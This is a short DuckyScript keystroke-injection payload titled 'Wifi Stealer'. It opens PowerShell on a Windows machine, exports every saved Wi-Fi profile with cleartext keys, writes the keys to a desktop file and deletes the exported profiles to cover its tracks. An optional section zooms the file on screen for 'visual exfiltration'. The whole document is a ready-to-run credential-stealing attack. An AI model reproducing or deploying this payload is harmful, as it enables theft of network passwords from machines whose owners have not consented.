REM Title: Wifi Stealer REM Author: 7h30th3r0n3 REM Target: Tested on Windows 7/8/10/11 REM Version: 1.1 REM Category: Grabber REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop, then it opens the file and zooms in REM Designed to be used for mouse hijacking on a machine whose screen is visible GUI r DELAY 500 STRING powershell ENTER DELAY 500 STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit ENTER REM If you want to zoom pop-up at the end for visual exfiltration replace "REMoption1" with nothing REMoption1 GUI m REMoption1 DELAY 4000 REMoption1 STRING 0 REMoption1 DELAY 100 REMoption1 ENTER REMoption1 DELAY 200 REMoption1 GUI UPARROW REMoption1 DELAY 100 REMoption1 CTRL = REMoption1 CTRL = REMoption1 CTRL = REMoption1 CTRL = REMoption1 CTRL = REMoption1 DELAY 10000 REMoption1 ALT F4 REMoption1 CTRL D